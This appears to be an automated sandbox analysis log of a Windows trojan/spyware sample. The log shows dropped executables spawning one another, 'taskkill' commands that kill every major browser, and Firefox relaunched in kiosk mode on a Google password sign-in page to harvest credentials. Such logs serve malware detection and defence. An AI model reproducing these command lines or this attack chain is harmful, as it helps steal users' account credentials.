Source: file.exe, 00000000.00000003.1845452492.00000000011C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1832252497.0000000005FDB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1840046269.0000000005FFA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822305587.0000000005EB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820064495.0000000005EB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823015872.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823253223.0000000005EB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823528118.000000000603D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1829771849.0000000005EB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822896177.000000000602F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825611034.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819875684.0000000005F5E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1832490060.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1838846241.000000000614A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1836958216.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824538759.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1826035440.0000000005F99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1829167071.0000000005EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819669815.0000000005EBA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1831414755.00000000060D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823133103.0000000005F76000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821837687.0000000005F59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1840523116.0000000006004000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819319868.0000000005F5A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1826463746.0000000005F9F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1845729075.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1836395855.0000000005EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825867094.0000000005EB3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1826246368.0000000005EB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819077177.0000000005EBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824943030.000000000605F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822652634.0000000005EB3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1844618236.0000000005A47000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823388583.0000000005F79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822190145.0000000005F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1844921816.00000000011C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824280785.0000000005F91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819494239.0000000005B13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1836100777.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828149795.0000000005EBE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821951667.000000000600D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823663193.0000000005EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1840201272.000000000614C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828366024.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1836660996.000000000612A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1839646417.000000000600F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1836809660.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1838636207.0000000005FFF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820381813.0000000005F55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1825076603.0000000005EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1834433117.0000000005EB8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1838106045.0000000005FF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830296810.0000000005FC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1826679868.0000000006084000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818856315.0000000005F5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1838415657.0000000005EB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1845244184.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818247036.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1833137945.0000000005FDA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1840360402.0000000005EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828782374.0000000005EB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1827065953.0000000005FAC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1822416368.0000000005F66000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1837333713.0000000006131000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: Section: ZLIB complexity 0.998020265667575
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.0.dr Static PE information: Section: bleglpjp ZLIB complexity 0.9942190613503985
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.998020265667575
Source: skotes.exe.3.dr Static PE information: Section: bleglpjp ZLIB complexity 0.9942190613503985
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: 6cadd3f0fd.exe.8.dr Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: random[1].exe0.8.dr Static PE information: Section: usisoqoi ZLIB complexity 0.9949866959291486
Source: 1171a5b648.exe.8.dr Static PE information: Section: usisoqoi ZLIB complexity 0.9949866959291486
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: Section: ZLIB complexity 0.998020265667575
Source: B1DZUXGXMC4OXONLCU5KVQ.exe.13.dr Static PE information: Section: bleglpjp ZLIB complexity 0.9942190613503985
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@84/34@101/14
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.1681717879.0000000005A2A000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454611051.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2455187968.000000000528A000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586578333.000000000586A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 52%
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe "C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe "C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe"
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2232 -prefMapHandle 2228 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70149f39-4644-4285-b4ad-18afc232e38d} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c164c71110 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1632 -parentBuildID 20230927232528 -prefsHandle 1484 -prefMapHandle 3904 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33f69ba0-f69f-45b7-b28b-3edde4189f95} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c176eb0a10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe "C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe "C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2316 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2188 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e1a6159-709e-4015-91b7-c27852cbfe8d} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d594569d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4516 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4476 -prefMapHandle 4520 -prefsLen 32092 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {772a86bb-9c44-49fb-b5c4-a3def5e3b247} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d5a7886d10 utility
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe "C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe "C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: unknown unknown Jump to behavior
